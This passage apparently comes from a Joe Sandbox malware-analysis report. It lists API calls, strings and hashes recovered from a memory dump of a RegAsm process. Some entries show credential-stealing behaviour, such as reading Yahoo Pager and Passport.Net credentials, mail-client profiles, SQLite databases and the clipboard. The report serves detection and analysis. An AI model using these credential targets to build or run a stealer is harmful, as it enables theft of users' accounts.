                                                                                                                                                                                                • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                                                • Opcode ID: c740e99957d3823e1ca2a26bbc78dd8b4854877f08f504732b6d9e79513b28b3
                                                                                                                                                                                                • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                                                                                                                • Opcode Fuzzy Hash: c740e99957d3823e1ca2a26bbc78dd8b4854877f08f504732b6d9e79513b28b3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                                                                                                • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                                                                                                • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                                                                                                                • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 19018683-0
                                                                                                                                                                                                • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                                • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                                                                                                                • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                                • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040644F
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                                                                                                  • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                                  • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                                                                                                  • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 438689982-0
                                                                                                                                                                                                • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                                • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                                                                                                                • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                                • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0044495F
                                                                                                                                                                                                • memset.MSVCRT ref: 00444978
                                                                                                                                                                                                • memset.MSVCRT ref: 0044498C
                                                                                                                                                                                                  • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                                • strlen.MSVCRT ref: 004449A8
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                  • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpymemset$strlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2142929671-0
                                                                                                                                                                                                • Opcode ID: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                                                                                                                                • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                                                                                                                                • Opcode Fuzzy Hash: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                                  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                                                                                                                • strlen.MSVCRT ref: 0040F7BE
                                                                                                                                                                                                • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                                                • String ID: Passport.Net\*
                                                                                                                                                                                                • API String ID: 2053021465-3671122194
                                                                                                                                                                                                • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                                                                                                                • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                                                                                                                • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                                • memset.MSVCRT ref: 0040330B
                                                                                                                                                                                                • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                                                                                                • strchr.MSVCRT ref: 0040335A
                                                                                                                                                                                                  • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                                                                                                • strlen.MSVCRT ref: 0040339C
                                                                                                                                                                                                  • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                                                • String ID: Personalities
                                                                                                                                                                                                • API String ID: 2103853322-4287407858
                                                                                                                                                                                                • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                                                                                                                • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                                                                                                                • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00444573
                                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CloseOpenQueryValuememset
                                                                                                                                                                                                • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                                                • API String ID: 1830152886-1703613266
                                                                                                                                                                                                • Opcode ID: 92186b2843cb95c86930638de19930e82a7f4a8b6566e79db89fa237099746d1
                                                                                                                                                                                                • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 92186b2843cb95c86930638de19930e82a7f4a8b6566e79db89fa237099746d1
                                                                                                                                                                                                • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLastMessagesprintf
                                                                                                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                                                                                                • API String ID: 1670431679-1552265934
                                                                                                                                                                                                • Opcode ID: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                                                                                                • Instruction ID: a7eabb7ac59324d00fe13b249bdc4a7432a02f94c8438c44d3dfd779c6ab1540
                                                                                                                                                                                                • Opcode Fuzzy Hash: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                                                                                                • Instruction Fuzzy Hash: AEF0A77A8001086BDB10A7A4DC05FA676BCBB44344F1500B6B945F2151EA74DA058F98
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                                                                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                                                                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                • API String ID: 3510742995-272990098
                                                                                                                                                                                                • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                                                                                • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                                                                                                                                                                • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                • String ID: H
                                                                                                                                                                                                • API String ID: 2221118986-2852464175
                                                                                                                                                                                                • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                                • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                                                                                                                • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                                • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                                • API String ID: 3510742995-3170954634
                                                                                                                                                                                                • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                                • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                                                                                                                • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                                                                                                                                                                • memcmp.MSVCRT ref: 0041DBAE
                                                                                                                                                                                                • memcmp.MSVCRT ref: 0041DBDB
                                                                                                                                                                                                • memcmp.MSVCRT ref: 0041DC47
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                                                                • String ID: @ $SQLite format 3
                                                                                                                                                                                                • API String ID: 231171946-3708268960
                                                                                                                                                                                                • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                                                                                • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                                                                                                                                                                • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                • String ID: winWrite1$winWrite2
                                                                                                                                                                                                • API String ID: 438689982-3457389245
                                                                                                                                                                                                • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                                • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                                                                                                                • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                                • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                                                • String ID: winRead
                                                                                                                                                                                                • API String ID: 1297977491-2759563040
                                                                                                                                                                                                • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                                • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                                                                                                • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                                • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0044955B
                                                                                                                                                                                                • memset.MSVCRT ref: 0044956B
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                                                • String ID: gj
                                                                                                                                                                                                • API String ID: 1297977491-4203073231
                                                                                                                                                                                                • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                                • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                                • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                                • memset.MSVCRT ref: 0040AB9C
                                                                                                                                                                                                  • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                                  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                                  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                                • sprintf.MSVCRT ref: 0040ABE1
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                • API String ID: 3337535707-2769808009
                                                                                                                                                                                                • Opcode ID: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                                                                                                                • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                                                                                                                • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                                                                                                • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                                                                                                • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1189762176-0
                                                                                                                                                                                                • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                                • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                                • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetParent.USER32(?), ref: 004090C2
                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4247780290-0
                                                                                                                                                                                                • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                                • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                                                                                                                APIs
